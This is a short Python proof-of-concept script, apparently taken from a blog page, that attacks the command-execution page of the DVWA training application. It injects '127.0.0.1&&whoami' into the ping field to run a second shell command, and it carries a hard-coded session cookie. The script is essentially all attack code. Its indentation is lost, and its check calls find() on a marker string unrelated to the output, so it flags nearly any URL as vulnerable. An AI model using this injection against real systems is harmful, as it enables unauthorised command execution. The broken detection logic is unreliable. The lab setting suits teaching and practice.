# -*- coding: utf-8 -*-
"""
@Time : 2023/2/22 16:43
@Auth : aur02a
@File :命令执行poc.py
@IDE :PyCharm
@Motto:还未老,想养老,小小年纪,苦恼苦恼
"""
import requests
def postrequest(url):
path = '/DVWA-master/vulnerabilities/exec/#'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Cookie': 'PHPSESSID=ncqd7juih083p2naa3ut0ds1h3; security=low',
}
data = {'ip': '127.0.0.1%26%26+whoami', 'Submit': 'Submit'}
# data = 'ip=127.0.0.1%26%26+whoami&Submit=Submit'
url = url + path
# h = requests.post(url,data=data,headers=headers,proxies=proxies)
h = requests.post(url, data=data, headers=headers)
return h
def poc(url):
response = postrequest(url)
if response.text.find("9dgqor8k"):
print(url+'\033[31m存在命令执行漏洞\033[0m')
else:
print(url+"不存在命令执行漏洞")
if "__main__" == __name__ :
url = input("please enter your address:")
poc(url)
09-23
976
“相关推荐”对你有帮助么?
-
非常没帮助
-
没帮助
-
一般
-
有帮助
-
非常有帮助
提交